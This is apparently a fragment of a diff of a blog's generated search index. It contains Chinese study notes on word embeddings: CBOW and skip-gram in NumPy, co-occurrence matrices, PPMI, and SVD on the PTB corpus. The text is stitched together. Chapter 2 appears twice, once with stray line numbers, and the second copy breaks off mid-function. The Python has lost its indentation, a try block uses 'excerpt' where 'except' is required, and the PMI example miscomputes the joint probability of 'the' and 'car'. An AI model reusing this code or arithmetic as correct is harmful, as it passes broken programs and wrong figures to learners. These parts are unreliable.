    这样就从语料库生成了上下文和目标词,后面只需将它们赋给 CBOW 模型即可。不过,因为这些上下文和目标词的元素还是单词 ID,所以还需
    要将它们转化为 one-hot 表示。

    3.3.2 转换为 one-hot 表示

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    import sys
    sys.path.append('..')
    from common.util import preprocess, create_contexts_target, convert_one_hot

    text = 'You say goodbye and I say hello.'

    corpus, word_to_id, id_to_word = preprocess(text)

    contexts, target = create_contexts_target(corpus, window_size=1)

    vocab_size = len(word_to_id)
    target = convert_one_hot(target, vocab_size)
    contexts = convert_one_hot(contexts, vocab_size)

    3.4 CBOW 模型的实现

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    import sys
    sys.path.append('..')
    import numpy as np
    from common.layers import MatMul, SoftmaxWithLoss

    class SimpleCBOW:
    def __init__(self, vocab_size, hidden_size):
    """
    vocab_size: 词汇个数
    hidden_size: 中间层的神经元个数
    """
    V, H = vocab_size, hidden_size

    # 初始化权重
    W_in = 0.01 * np.random.randn(V, H).astype('f') # 初始化将使用 32 位的浮点数
    W_out = 0.01 * np.random.randn(H, V).astype('f')

    # 生成层
    self.in_layer0 = MatMul(W_in)
    self.in_layer1 = MatMul(W_in)
    self.out_layer = MatMul(W_out)
    self.loss_layer = SoftmaxWithLoss()

    # 将所有的权重和梯度整理到列表中
    layers = [self.in_layer0, self.in_layer1, self.out_layer]
    self.params, self.grads = [], []
    for layer in layers:
    self.params += layer.params
    self.grads += layer.grads

    # 将单词的分布式表示设置为成员变量
    self.word_vecs = W_in


    def forward(self, contexts, target):
    """
    神经网络的正向传播 forward() 函数。
    这个函数接收参数 contexts 和 target,并返回损失(loss)。
    """
    h0 = self.in_layer0.forward(contexts[:, 0])
    h1 = self.in_layer1.forward(contexts[:, 1])
    h = (h0 + h1) * 0.5
    score = self.out_layer.forward(h)
    loss = self.loss_layer.forward(score, target)
    return loss


    def backward(self, dout=1):
    """
    反向传播
    """
    ds = self.loss_layer.backward(dout)
    da = self.out_layer.backward(ds)
    da *= 0.5
    self.in_layer1.backward(da)
    self.in_layer0.backward(da)
    return None

    学习的实现

    CBOW 模型的学习和一般的神经网络的学习完全相同。首先,给神经网络准备好学习数据。然后,求梯度,并逐步更新权重参数。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    import sys
    sys.path.append('..')
    from common.trainer import Trainer
    from common.optimizer import Adam
    from common.util import preprocess, create_contexts_target, convert_one_hot

    window_size = 1
    hidden_size = 5
    batch_size = 3
    max_epoch = 1000

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)

    vocab_size = len(word_to_id)
    contexts, target = create_contexts_target(corpus, window_size)
    target = convert_one_hot(target, vocab_size)
    contexts = convert_one_hot(contexts, vocab_size)

    model = SimpleCBOW(vocab_size, hidden_size)
    optimizer = Adam()
    trainer = Trainer(model, optimizer)
    trainer.fit(contexts, target, max_epoch, batch_size)
    trainer.plot()

    png

    查看学习后的权重参数

    1
    2
    3
    word_vecs = model.word_vecs
    for word_id, word in id_to_word.items():
    print(word, word_vecs[word_id])
    you [-0.9274265  -0.91214865 -0.9109259   0.8992449  -1.6783223 ]say [ 1.1131934  1.0601219  1.1271317 -1.1453978 -1.2170266]goodbye [-0.9434733  -0.9451493  -1.0034578   1.0183493   0.01961206]and [ 0.68801135  1.3125733   0.7976222  -0.66661966 -1.7473713 ]i [-0.9705925  -0.96961325 -1.0059276   1.0296363   0.02202316]hello [-0.9177436  -0.9189522  -0.90853983  0.89148486 -1.6829524 ]. [ 1.2674404   0.2086714   1.1918164  -1.3567644   0.25613624]

    这里使用的小型语料库并没有给出很好的结果。当然,主要原因是语料库太小了。如果换成更大、更实用的语料库,相信会获得更好的结果。但是,这样在处理速度方面又会出现新的问题,这是因为当前这个 CBOW 模型的实现在处理效率方面存在几个问题。

    3.5 word2vec 的补充说明

    3.5.1 CBOW 模型和概率

    给定上下文 $w_{t−1}$ 和 $w_{t+1}$ 时目标词为 $w_t$ 的概率。使用后验概率:

    $$P(w_t|w_{t-1},w_{t+1})$$

    CBOW 模型的损失函数只是对上式的概率取 $\log$,并加上负号。顺便提一下,这也称为负对数似然(negative log likelihood)

    $$L=-\log P(w_t|w_{t-1}, w_{t+1})$$

    上式是一笔样本数据的损失函数。如果将其扩展到整个语料库:

    $$L=-\frac{1}{T}\sum^T_{t=1}\log P(w_t|w_{t-1}, w_{t+1})$$

    3.5.2skip-gram 模型

    png

    skip-gram 是反转了 CBOW 模型处理的上下文和目标词的模型。

    • CBOW 模型从上下文的多个单词预测中间的单词(目标词)

    • skip-gram 模型则从中间的单词(目标词)预测周围的多个单词(上下文)

    skip-gram 可以建模为:

    $$P(w_{t-1}, w_{t+1}|w_t)$$

    “当给定 $w_t$ 时,$w_{t−1}$ 和 $w_{t+1}$ 同时发生的概率”。

    $$P(w_{t-1},w_{t+1}|w_t)=P(w_{t-1}|w_t)P(w_{t+1}|w_t)$$

    带入交叉熵损失函数,推导出 skip-gram 模型的损失函数:

    $$L=-\frac{1}{T}\sum^T_{t=1}(\log P(w_{t-1}|w_t) + \log P(w_{t+1}|w_t))$$

    3.5.3 基于计数于基于推理

    • 基于计数的方法通过对整个语料库的统计数据进行一次学习来获得单词的分布式表示

    • 基于推理的方法则反复观察语料库的一部分数据进行学习(mini-batch 学习)

    在 word2vec 之后,有研究人员提出了 GloVe 方法。GloVe 方法融合了基于推理的方法和基于计数的方法。该方法的思想是,将整个语料库的统计数据的信息纳入损失函数,进行 mini-batch 学习(具体请参考论文)。据此,这两个方法论成功地被融合在了一起。

    3.6 小结

    • 基于推理的方法以预测为目标,同时获得了作为副产物的单词的分布式表示

    • word2vec 是基于推理的方法,由简单的 2 层神经网络构成

    • word2vec 有 skip-gram 模型和 CBOW 模型

    • CBOW 模型从多个单词(上下文)预测 1 个单词(目标词)

    • skip-gram 模型反过来从 1 个单词(目标词)预测多个单词(上下文)

    • 由于 word2vec 可以进行权重的增量学习,所以能够高效地更新或添加单词的分布式表示

    ]]>
    @@ -8009,7 +8009,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E8%BF%9B%E9%98%B6-%E8%87%AA%E7%84%B6%E8%AF%AD%E8%A8%80%E5%A4%84%E7%90%86-2-%E8%87%AA%E7%84%B6%E8%AF%AD%E8%A8%80%E5%92%8C%E5%8D%95%E8%AF%8D%E7%9A%84%E5%88%86%E5%B8%83%E5%BC%8F%E8%A1%A8%E7%A4%BA/ - 正文

    2.1 什么是自然语言处理

    让计算机理解单词含义,单词含义的表示方法:

    • 基于同义词词典的方法

    • 基于计数的方法

    • 基于推理的方法(word2vec)

    2.2 同义词词典

    在同义词词典中,具有相同含义的单词(同义词)或含义类似的单词(近义词)被归类到同一个组中。

    在自然语言处理中用到的同义词词典有时会定义单词之间的粒度更细的关系,比如“上位-下位”关系、“整体-部分”关系。

    2.2.1 WordNet

    WordNet 是普林斯顿大学于 1985 年开始开发的同义词词典,迄今已用于许多研究,并活跃于各种自然语言处理应用中。

    2.2.2 同义词词典的问题

    • 难以顺应时代变化

    • 人力成本高

    • 无法表示单词的微妙差异

    2.3 基于计数的方法

    语料库中包含了大量的关于自然语言的实践知识,即文章的写作方法、单词的选择方法和单词含义等。基于计数的方法的目标就是从这些富有实践知识的语料库中,自动且高效地提取本质。

    2.3.1 基于 Python 的语料库的预处理

    将文本分割为单词(分词),并将分割后的单词列表转化为单词 ID 列表。

    text = 'You say goodbye and I say hello.'
    text = text.lower()
    text = text.replace('.', ' .')
    text
    'you say goodbye and i say hello .'
    words = text.split(' ')
    words
    ['you', 'say', 'goodbye', 'and', 'i', 'say', 'hello', '.']

    给单词标上 ID,以便使用单词 ID 列表:

    word_to_id = {}
    id_to_word = {}

    for word in words:
    if word not in word_to_id:
    new_id = len(word_to_id)
    word_to_id[word] = new_id
    id_to_word[new_id] = word
    id_to_word
    {0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}
    word_to_id
    {'you': 0, 'say': 1, 'goodbye': 2, 'and': 3, 'i': 4, 'hello': 5, '.': 6}

    根据单词 ID 检索单词:

    id_to_word[1]
    'say'

    根据单词检索单词 ID:

    word_to_id['hello']
    5

    将单词列表转化为单词 ID 列表:

    import numpy as np

    corpus = [word_to_id[w] for w in words]
    corpus = np.array(corpus)
    corpus
    array([0, 1, 2, 3, 4, 1, 5, 6])
    def preprocess(text):
    text = text.lower()
    text = text.replace('.', ' .')
    words = text.split(' ')
    word_to_id = {}
    id_to_word = {}
    for word in words:
    if word not in word_to_id:
    new_id = len(word_to_id)
    word_to_id[word] = new_id
    id_to_word[new_id] = word
    corpus = np.array([word_to_id[w] for w in words])
    return corpus, word_to_id, id_to_word

    使用这个函数,可以按如下方式对语料库进行预处理:

    text = 'You say goodbye and I say hello.'
    """
    corpus 是单词 ID 列表,word_to_id 是单词到单词 ID 的字典,id_to_word 是单词 ID 到单词的字典。
    """
    corpus, word_to_id, id_to_word = preprocess(text)

    2.3.2 单词的分布式表示

    在单词领域构建紧凑合理的向量表示。在自然语言处理领域,这称为分布式表示

    2.3.3 分布式假设

    “某个单词的含义由它周围的单词形成”,称为分布式假设(distributional hypothesis)

    这里,我们将上下文的大小(即周围的单词有多少个)称为窗口大小(window size)

    2.3.4 共现矩阵

    在关注某个单词的情况下,对它的周围出现了多少次什么单词进行计数,然后再汇总。这里,我们将这种做法称为“基于计数的方法”,在有的文献中也称为“基于统计的方法”。

    import sys
    sys.path.append('..')
    import numpy as np
    from common.util import preprocess

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    corpus
    array([0, 1, 2, 3, 4, 1, 5, 6])
    id_to_word
    {0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}

    png

    C = np.array([
    [0, 1, 0, 0, 0, 0, 0],
    [1, 0, 1, 0, 1, 1, 0],
    [0, 1, 0, 1, 0, 0, 0],
    [0, 0, 1, 0, 1, 0, 0],
    [0, 1, 0, 1, 0, 0, 0],
    [0, 1, 0, 0, 0, 0, 1],
    [0, 0, 0, 0, 0, 1, 0],
    ], dtype=np.int32)
    print(C[0])  # 单词 ID 为 0 的向量
    [0 1 0 0 0 0 0]
    print(C[4])  # 单词 ID 为 4 的向量
    [0 1 0 1 0 0 0]
    print(C[word_to_id['goodbye']]) # goodbye 的向量
    [0 1 0 1 0 0 0]

    实现一个能直接从语料库生成共现矩阵的函数:

    def create_co_matrix(corpus, vocab_size, window_size=1):
    """
    直接从语料库生成共现矩阵
    corpus: 单词 ID 列表
    vocab_size: 词汇个数
    window_size: 窗口大小
    """
    corpus_size = len(corpus)
    co_matrix = np.zeros((vocab_size, vocab_size), dtype=np.int32)
    for idx, word_id in enumerate(corpus):
    for i in range(1, window_size + 1):
    left_idx = idx - i
    right_idx = idx + i

    if left_idx >= 0:
    left_word_id = corpus[left_idx]
    co_matrix[word_id, left_word_id] += 1

    if right_idx < corpus_size:
    right_word_id = corpus[right_idx]
    co_matrix[word_id, right_word_id] += 1
    return co_matrix

    2.3.5 向量间的相似度

    余弦相似度(cosine similarity)。设有 $x=(x_1,x_2,x_3,…,x_n)$ 和 $y=(y_1,y_2,y_3,…,y_n)$ 两个向量,它们之间的余弦相似度定义如下:

    $$\mathrm{similarity}(x,y)=\frac{x\cdot y}{||x||\ ||y||}\frac{x_1y_1+…+x_ny_n}{\sqrt{x2_1+…+x2_n}\sqrt{y2_1+…+y2_n}}$$

    def cos_similarity(x, y):
    nx = x / np.sqrt(np.sum(x ** 2)) # x 的正规化
    ny = y / np.sqrt(np.sum(y ** 2)) # y 的正规化
    return np.dot(nx, ny)

    这里当零向量(元素全部为 0 的向量)被赋值给参数时,会出现“除数为 0”(zero division)的错误。

    通过参数指定一个微小值 eps(eps 是 epsilon 的缩写),并默认 eps=1e-8(= 0.000 000 01)以防止“除数为 0”的错误。

    def cos_similarity(x, y, eps=1e-8):
    nx = x / (np.sqrt(np.sum(x ** 2)) + eps)
    ny = y / (np.sqrt(np.sum(y ** 2)) + eps)
    return np.dot(nx, ny)

    youi(= I)的相似度:

    import sys
    sys.path.append('..')
    from common.util import preprocess, create_co_matrix, cos_similarity

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    vocab_size = len(word_to_id)
    C = create_co_matrix(corpus, vocab_size)
    c0 = C[word_to_id['you']] # you 的单词向量
    c1 = C[word_to_id['i']] # i 的单词向量
    print(cos_similarity(c0, c1))
    0.7071067691154799

    2.3.6 相似单词的排序

    def most_similar(query, word_to_id, id_to_word, word_matrix, top=5):
    """
    当某个单词被作为查询词时,将与这个查询词相似的单词按降序显示出来。
    """
    # 1. 取出查询词
    if query not in word_to_id:
    print('%s is not found' % query)
    return
    print('\n[query] ' + query)
    query_id = word_to_id[query]
    query_vec = word_matrix[query_id]

    # 2. 计算余弦相似度
    vocab_size = len(id_to_word)
    similarity = np.zeros(vocab_size)
    for i in range(vocab_size):
    similarity[i] = cos_similarity(word_matrix[i], query_vec)

    # 3. 基于余弦相似度,按降序输出值
    count = 0
    # argsort() 方法可以按升序对 NumPy 数组的元素进行排序(不过,返回值是数组的索引)
    for i in (-1 * similarity).argsort():
    if id_to_word[i] == query:
    continue
    print(' %s: %s' % (id_to_word[i], similarity[i]))

    count += 1
    if count >= top:
    return

    试着使用一下。这里将 you 作为查询词,显示与其相似的单词。

    import sys
    sys.path.append('..')
    from common.util import preprocess, create_co_matrix, most_similar

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    vocab_size = len(word_to_id)
    C = create_co_matrix(corpus, vocab_size)

    most_similar('you', word_to_id, id_to_word, C, top=5)
    [query] you goodbye: 0.7071067691154799 i: 0.7071067691154799 hello: 0.7071067691154799 say: 0.0 and: 0.0

    2.4 基于计数的方法的改进

    2.4.1 点互信息

    如果只看单词的出现次数,那么与 drive 相比,the 和 car 的相关性更强。这意味着,仅仅因为 the 是个常用词,它就被认为与 car 有很强的相关性。

    点互消息(Pointwise Mutual Information, PMI)。对于随机变量 $x$ 和 $y$,它们的 PMI 定义如下:

    $$\mathrm{PMI}(x,y)=\log_2\frac{P(x,y)}{P(x)P(y)}$$

    $P(x)$ 表示 $x$ 发生的概率,$P(y)$ 表示 $y$ 发生的概率,$P(x, y)$ 表示 $x$ 和 $y$ 同时发生的概率。PMI 的值越高,表明相关性越强。

    在自然语言的例子中,$P(x)$ 就是指单词 $x$ 在语料库中出现的概率。假设某个语料库中有 10 000 个单词,其中单词 the 出现了 100 次,则$P(“\mathrm{the}”)=\frac{100}{10000}=0.01$ 另外,$P(x, y)$ 表示单词 $x$ 和 $y$ 同时出现的概率。假设 thecar 一起出现了 10 次,则$P(“\mathrm{the}”,“\mathrm{car}”)=\frac{100}{10000}=0.01$。

    共现矩阵表示为 $C$,将单词 $x$ 和 $y$ 的共现次数表示为 $C(x, y)$,将单词 $x$ 和 $y$ 的出现次数分别表示为 $C(x)$、$C(y)$,将语料库的单词数量记为 $N$,则:

    $$\mathrm{PMI}(x,y)=\log_2\frac{P(x,y)}{P(x)P(y)}=\log_2\frac{\frac{C(x,y)}{N}}{\frac{C(x)}{N}\frac{C(y)}{N}}=\log_2\frac{C(x,y)\cdot N}{C(x)C(y)}$$

    在使用 PMI 的情况下,与 the 相比,drive 和 car 具有更强的相关性。这是我们想要的结果。之所以出现这个结果,是因为我们考虑了单词单独出现的次数。在这个例子中,因为 the 本身出现得多,所以 PMI 的得分被拉低了。式中的“≈”(near equal)表示近似相等的意思。

    PMI 的问题:当两个单词的共现次数为 0 时,$\log_2 0=-\infty$。为了解决这个问题,实践上我们会使用下述正的点互信息(Positive PMI,PPMI)

    $$\mathrm{PPMI}(x,y)=\max(0,\mathrm{PMI}(x,y))$$

    PMI 是负数时,将其视为 0,这样就可以将单词间的相关性表示为大于等于 0 的实数。

    def ppmi(C, verbose=False, eps=1e-8):
    """
    erbose: 决定是否输出运行情况的标志。
    当处理大语料库时,设置 verbose=True,可以用于确认运行情况
    为了防止 np.log2(0)=-inf 而使用了微小值 eps
    """
    M = np.zeros_like(C, dtype=np.float32)
    N = np.sum(C)
    S = np.sum(C, axis=0)
    total = C.shape[0] * C.shape[1]
    cnt = 0
    for i in range(C.shape[0]):
    for j in range(C.shape[1]):
    pmi = np.log2(C[i, j] * N / (S[j]*S[i]) + eps)
    M[i, j] = max(0, pmi)
    if verbose:
    cnt += 1
    if cnt % (total//100+1) == 0:
    print('%.1f%% done' % (100*cnt/total))
    return M

    将共现矩阵转化为 PPMI 矩阵:

    import sys
    sys.path.append('..')
    import numpy as np
    from common.util import preprocess, create_co_matrix, cos_similarity, ppmi

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    vocab_size = len(word_to_id)
    C = create_co_matrix(corpus, vocab_size)
    W = ppmi(C)
    np.set_printoptions(precision=3) # 有效位数为 3 位

    print('covariance matrix')
    print(C)
    print('-'*50)
    print('PPMI')
    print(W)
    covariance matrix[[0 1 0 0 0 0 0] [1 0 1 0 1 1 0] [0 1 0 1 0 0 0] [0 0 1 0 1 0 0] [0 1 0 1 0 0 0] [0 1 0 0 0 0 1] [0 0 0 0 0 1 0]]--------------------------------------------------PPMI[[0.    1.807 0.    0.    0.    0.    0.   ] [1.807 0.    0.807 0.    0.807 0.807 0.   ] [0.    0.807 0.    1.807 0.    0.    0.   ] [0.    0.    1.807 0.    1.807 0.    0.   ] [0.    0.807 0.    1.807 0.    0.    0.   ] [0.    0.807 0.    0.    0.    0.    2.807] [0.    0.    0.    0.    0.    2.807 0.   ]]

    PPMI 矩阵的问题:随着语料库的词汇量增加,各个单词向量的维数也会增加。

    2.4.2 降维

    在尽量保留“重要信息”的基础上减少向量维度。

    png

    奇异值分解(Singular Value Decomposition,SVD)。SVD 将任意矩阵分解为 3 个矩阵的乘积:

    $$X=USV^T$$

    SVD 将任意的矩阵 $X$ 分解为 $U、S、V$ 这 3 个矩阵的乘积,其中 $U$ 和 $V$ 是列向量彼此正交的正交矩阵,$S$ 是除了对角线元素以外其余元素均为 0 的对角矩阵。

    2.4.3 基于 SVD 的降维

    import sys
    sys.path.append('..')
    import numpy as np
    import matplotlib.pyplot as plt
    from common.util import preprocess, create_co_matrix, ppmi

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    vocab_size = len(id_to_word)
    C = create_co_matrix(corpus, vocab_size, window_size=1)
    W = ppmi(C)

    # SVD
    U, S, V = np.linalg.svd(W)
    print(C[0])  # 共现矩阵
    [0 1 0 0 0 0 0]
    print(W[0]) # PPMI 矩阵
    [0.    1.807 0.    0.    0.    0.    0.   ]
    print(U[0]) # SVD
    [-3.409e-01 -1.110e-16 -3.886e-16 -1.205e-01  0.000e+00  9.323e-01  2.226e-16]

    原先的稀疏向量 $W[0]$ 经过 SVD 被转化成了密集向量 $U[0]$

    for word, word_id in word_to_id.items():
    plt.annotate(word, (U[word_id, 0], U[word_id, 1]))
    plt.scatter(U[:,0], U[:,1], alpha=0.5)
    plt.show()


    png

    goodbyehelloyoui 位置接近,这是比较符合我们的直觉的。

    如果矩阵大小是 N,SVD 的计算的复杂度将达到 O(N3)。这意味着 SVD 需要与 N 的立方成比例的计算量。因为现实中这样的计算量是做不到的,所以往往会使用 Truncated SVD 等更快的方法。

    2.4.4 PTB 数据集

    我们使用的 PTB 语料库在 word2vec 的发明者托马斯· 米科洛夫(Tomas Mikolov)的网页上有提供。这个 PTB 语料库是以文本文件的形式提供的,与原始的 PTB 的文章相比,多了若干预处理,包括将稀有单词替换成特殊字符(unk 是 unknown 的简称),将具体的数字替换成“N”等。

    PTB 下载地址:http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz

    import sys
    sys.path.append('..')
    from dataset import ptb

    corpus, word_to_id, id_to_word = ptb.load_data('train')
    print('corpus size:', len(corpus))
    print('corpus[:30]:', corpus[:30])
    print()
    print('id_to_word[0]:', id_to_word[0])
    print('id_to_word[1]:', id_to_word[1])
    print('id_to_word[2]:', id_to_word[2])
    print()
    print("word_to_id['car']:", word_to_id['car'])
    print("word_to_id['happy']:", word_to_id['happy'])
    print("word_to_id['lexus']:", word_to_id['lexus'])
    corpus size: 929589corpus[:30]: [ 0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29]id_to_word[0]: aerid_to_word[1]: banknoteid_to_word[2]: berlitzword_to_id['car']: 3856word_to_id['happy']: 4428word_to_id['lexus']: 7426

    2.4.5 基于 PTB 数据集的评价

    这里建议使用更快速的 SVD 对大矩阵执行 SVD,为此我们需要安装 sklearn 模块。当然,虽然仍可以使用基本版的 SVD(np.linalg.svd()),但是这需要更多的时间和内存。

    import sys
    sys.path.append('..')
    import numpy as np
    from common.util import most_similar, create_co_matrix, ppmi
    from dataset import ptb

    window_size = 2
    wordvec_size = 100
    corpus, word_to_id, id_to_word = ptb.load_data('train')
    vocab_size = len(word_to_id)
    print('counting co-occurrence ...')
    C = create_co_matrix(corpus, vocab_size, window_size)
    print('calculating PPMI ...')
    W = ppmi(C, verbose=True)

    print('calculating SVD ...')
    try:
    # truncated SVD (fast!)
    from sklearn.utils.extmath import randomized_svd
    U, S, V = randomized_svd(W, n_components=wordvec_size, n_iter=5, random_state=None)
    excerpt ImportError:
    # SVD (slow)
    U, S, V = np.linalg.svd(W)

    word_vecs = U[:, :wordvec_size]
    querys = ['you', 'year', 'car', 'toyota']
    for query in querys:
    most_similar(query, word_to_id, id_to_word, word_vecs, top=5)
    counting co-occurrence ...calculating PPMI ...C:\Users\gzjzx\Jupyter\DL_Advanced\..\common\util.py:139: RuntimeWarning: overflow encountered in long_scalars  pmi = np.log2(C[i, j] * N / (S[j]*S[i]) + eps)C:\Users\gzjzx\Jupyter\DL_Advanced\..\common\util.py:139: RuntimeWarning: invalid value encountered in log2  pmi = np.log2(C[i, j] * N / (S[j]*S[i]) + eps)1.0% done2.0% done3.0% done4.0% done5.0% done6.0% done7.0% done8.0% done9.0% done10.0% done11.0% done12.0% done13.0% done14.0% done15.0% done16.0% done17.0% done18.0% done19.0% done20.0% done21.0% done22.0% done23.0% done24.0% done25.0% done26.0% done27.0% done28.0% done29.0% done30.0% done31.0% done32.0% done33.0% done34.0% done35.0% done36.0% done37.0% done38.0% done39.0% done40.0% done41.0% done42.0% done43.0% done44.0% done45.0% done46.0% done47.0% done48.0% done49.0% done50.0% done51.0% done52.0% done53.0% done54.0% done55.0% done56.0% done57.0% done58.0% done59.0% done60.0% done61.0% done62.0% done63.0% done64.0% done65.0% done66.0% done67.0% done68.0% done69.0% done70.0% done71.0% done72.0% done73.0% done74.0% done75.0% done76.0% done77.0% done78.0% done79.0% done80.0% done81.0% done82.0% done83.0% done84.0% done85.0% done86.0% done87.0% done88.0% done89.0% done90.0% done91.0% done92.0% done93.0% done94.0% done95.0% done96.0% done97.0% done98.0% done99.0% donecalculating SVD ...[query] you i: 0.6670734286308289 we: 0.6116090416908264 someone: 0.549290657043457 do: 0.5428591370582581 'll: 0.5290063619613647[query] year month: 0.6682149171829224 quarter: 0.6562734246253967 next: 0.6095362305641174 fiscal: 0.5867708921432495 earlier: 0.5734390616416931[query] car luxury: 0.6188714504241943 auto: 0.6056600213050842 corsica: 0.5616344809532166 domestic: 0.5556454062461853 cars: 0.521730363368988[query] toyota motor: 0.7244030237197876 motors: 0.6643518209457397 nissan: 0.6601378917694092 lexus: 0.6493816375732422 honda: 0.6213896870613098

    成功地将单词含义编码成了向量,真是可喜可贺!使用语料库,计算上下文中的单词数量,将它们转化 PPMI 矩阵,再基于 SVD 降维获得好的单词向量。这就是单词的分布式表示,每个单词表示为固定长度的密集向量。

    2.5 小结

    • 使用 WordNet 等同义词词典,可以获取近义词或测量单词间的相似度等

    • 使用同义词词典的方法存在创建词库需要大量人力、新词难更新等问题

    • 目前,使用语料库对单词进行向量化是主流方法

    • 近年来的单词向量化方法大多基于“单词含义由其周围的单词构成”这一分布式假设

    • 在基于计数的方法中,对语料库中的每个单词周围的单词的出现频数进行计数并汇总(= 共现矩阵)

    • 通过将共现矩阵转化为 PPMI 矩阵并降维,可以将大的稀疏向量转变为小的密集向量

    • 在单词的向量空间中,含义上接近的单词距离上理应也更近

    ]]>
    + 正文

    2.1 什么是自然语言处理

    让计算机理解单词含义,单词含义的表示方法:

    • 基于同义词词典的方法

    • 基于计数的方法

    • 基于推理的方法(word2vec)

    2.2 同义词词典

    在同义词词典中,具有相同含义的单词(同义词)或含义类似的单词(近义词)被归类到同一个组中。

    在自然语言处理中用到的同义词词典有时会定义单词之间的粒度更细的关系,比如“上位-下位”关系、“整体-部分”关系。

    2.2.1 WordNet

    WordNet 是普林斯顿大学于 1985 年开始开发的同义词词典,迄今已用于许多研究,并活跃于各种自然语言处理应用中。

    2.2.2 同义词词典的问题

    • 难以顺应时代变化

    • 人力成本高

    • 无法表示单词的微妙差异

    2.3 基于计数的方法

    语料库中包含了大量的关于自然语言的实践知识,即文章的写作方法、单词的选择方法和单词含义等。基于计数的方法的目标就是从这些富有实践知识的语料库中,自动且高效地提取本质。

    2.3.1 基于 Python 的语料库的预处理

    将文本分割为单词(分词),并将分割后的单词列表转化为单词 ID 列表。

    1
    2
    3
    4
    text = 'You say goodbye and I say hello.'
    text = text.lower()
    text = text.replace('.', ' .')
    text
    'you say goodbye and i say hello .'
    1
    2
    words = text.split(' ')
    words
    ['you', 'say', 'goodbye', 'and', 'i', 'say', 'hello', '.']

    给单词标上 ID,以便使用单词 ID 列表:

    1
    2
    3
    4
    5
    6
    7
    8
    word_to_id = {}
    id_to_word = {}

    for word in words:
    if word not in word_to_id:
    new_id = len(word_to_id)
    word_to_id[word] = new_id
    id_to_word[new_id] = word
    1
    id_to_word
    {0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}
    1
    word_to_id
    {'you': 0, 'say': 1, 'goodbye': 2, 'and': 3, 'i': 4, 'hello': 5, '.': 6}

    根据单词 ID 检索单词:

    1
    id_to_word[1]
    'say'

    根据单词检索单词 ID:

    1
    word_to_id['hello']
    5

    将单词列表转化为单词 ID 列表:

    1
    2
    3
    4
    5
    import numpy as np

    corpus = [word_to_id[w] for w in words]
    corpus = np.array(corpus)
    corpus
    array([0, 1, 2, 3, 4, 1, 5, 6])
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    def preprocess(text):
    text = text.lower()
    text = text.replace('.', ' .')
    words = text.split(' ')
    word_to_id = {}
    id_to_word = {}
    for word in words:
    if word not in word_to_id:
    new_id = len(word_to_id)
    word_to_id[word] = new_id
    id_to_word[new_id] = word
    corpus = np.array([word_to_id[w] for w in words])
    return corpus, word_to_id, id_to_word

    使用这个函数,可以按如下方式对语料库进行预处理:

    1
    2
    3
    4
    5
    text = 'You say goodbye and I say hello.'
    """
    corpus 是单词 ID 列表,word_to_id 是单词到单词 ID 的字典,id_to_word 是单词 ID 到单词的字典。
    """
    corpus, word_to_id, id_to_word = preprocess(text)

    2.3.2 单词的分布式表示

    在单词领域构建紧凑合理的向量表示。在自然语言处理领域,这称为分布式表示

    2.3.3 分布式假设

    “某个单词的含义由它周围的单词形成”,称为分布式假设(distributional hypothesis)

    这里,我们将上下文的大小(即周围的单词有多少个)称为窗口大小(window size)

    2.3.4 共现矩阵

    在关注某个单词的情况下,对它的周围出现了多少次什么单词进行计数,然后再汇总。这里,我们将这种做法称为“基于计数的方法”,在有的文献中也称为“基于统计的方法”。

    1
    2
    3
    4
    5
    6
    7
    import sys
    sys.path.append('..')
    import numpy as np
    from common.util import preprocess

    text = 'You say goodbye and I say hello.'
    corpus, word_to_id, id_to_word = preprocess(text)
    1
    corpus
    array([0, 1, 2, 3, 4, 1, 5, 6])
    1
    id_to_word
    {0: 'you', 1: 'say', 2: 'goodbye', 3: 'and', 4: 'i', 5: 'hello', 6: '.'}

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    C = np.array([
    [0, 1, 0, 0, 0, 0, 0],
    [1, 0, 1, 0, 1, 1, 0],
    [0, 1, 0, 1, 0, 0, 0],
    [0, 0, 1, 0, 1, 0, 0],
    [0, 1, 0, 1, 0, 0, 0],
    [0, 1, 0, 0, 0, 0, 1],
    [0, 0, 0, 0, 0, 1, 0],
    ], dtype=np.int32)
    1
    print(C[0])  # 单词 ID 为 0 的向量
    [0 1 0 0 0 0 0]
    1
    print(C[4])  # 单词 ID 为 4 的向量
    [0 1 0 1 0 0 0]
    1
    print(C[word_to_id['goodbye']]) # goodbye 的向量
    [0 1 0 1 0 0 0]

    实现一个能直接从语料库生成共现矩阵的函数:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    def create_co_matrix(corpus, vocab_size, window_size=1):
    """
    直接从语料库生成共现矩阵
    corpus: 单词 ID 列表
    vocab_size: 词汇个数
    window_size: 窗口大小
    """
    corpus_size = len(corpus)
    co_matrix = np.zeros((vocab_size, vocab_size), dtype=np.int32)
    for idx, word_id in enumerate(corpus):
    for i in range(1, window_size + 1):
    left_idx = idx - i
    right_idx = idx + i

    if left_idx >= 0:
